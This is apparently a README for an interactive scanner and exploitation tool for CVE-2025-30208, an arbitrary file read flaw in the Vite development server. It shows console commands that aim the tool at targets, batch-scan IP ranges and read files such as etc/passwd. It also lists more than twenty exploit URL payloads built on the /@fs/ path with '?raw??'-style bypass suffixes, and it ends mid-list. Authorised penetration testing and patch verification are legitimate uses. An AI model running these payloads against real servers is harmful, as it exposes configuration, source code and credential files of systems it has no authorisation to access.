
CVE‑2025‑30208 is a medium-severity arbitrary file read vulnerability in the Vite development server (a popular frontend build tool)
Advanced vulnerability scanner for CVE-2025-30208 with enterprise-grade features
Professional penetration testing tool for Vite Arbitrary File Read vulnerability detection
🚀 Quick Start • 📋 Features • 🔧 Usage • 📊 Examples • 🛡️ Security
This is a comprehensive vulnerability scanner designed to detect and exploit the CVE-2025-30208 vulnerability in Vite development servers. The vulnerability allows arbitrary file read access through Vite's file system endpoints, potentially exposing sensitive configuration files, source code, and system information.
The tool now features a modular architecture for better maintainability and extensibility:
CVE-2025-30208.py - Main scanner applicationpayloads.py - Advanced exploitation payloads (60+ variations)sensitive_files.py - Comprehensive sensitive file database (200+ files)html_template.py - Enhanced hacker-style HTML reporting templatepip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| Command | Description | Example |
|---|---|---|
set <option> <value> | Set configuration options | set RHOST 192.168.1.100 |
show options | Display current settings | show options |
edit | Interactive option editor | edit |
run / exploit | Run vulnerability test | run |
batch | Batch scan multiple targets | batch |
scan | Discover sensitive files | scan |
pull | Export results to HTML/JSON | pull |
web [on|off|port] | Web server for HTML reports | web 8080 |
save | Save session configuration | save |
load | Load session configuration | load |
test | Test connectivity to target | test |
validate | Validate current configuration | validate |
verbose | Toggle verbose mode | verbose |
proxy | Configure proxy settings | proxy |
headers | Set custom HTTP headers | headers |
rate | Configure rate limiting | rate |
log | Show logging information | log |
help / ? | Show help | help |
exit / quit | Exit tool | exit |
| Option | Description | Default | Validation |
|---|---|---|---|
RHOST | Target host/IP address | - | Hostname/IP validation |
RPORT | Target port number | - | Port range (1-65535) |
FILEPATH | File path to test | etc/passwd | Path validation |
PROXY | HTTP/HTTPS proxy URL | - | URL format validation |
VERBOSE | Enable verbose output | false | Boolean validation |
RATE_LIMIT | Delay between requests (seconds) | 0.3 | Numeric validation |
THREADS | Number of threads for batch scanning | 5 | Integer validation |
TIMEOUT | Request timeout (seconds) | 5 | Integer validation |
CUSTOM_HEADERS | Custom HTTP headers (JSON) | {} | JSON format validation |
The scanner now uses 60+ different payload variations organized in payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
The tool now tests for 200+ sensitive files organized in sensitive_files.py: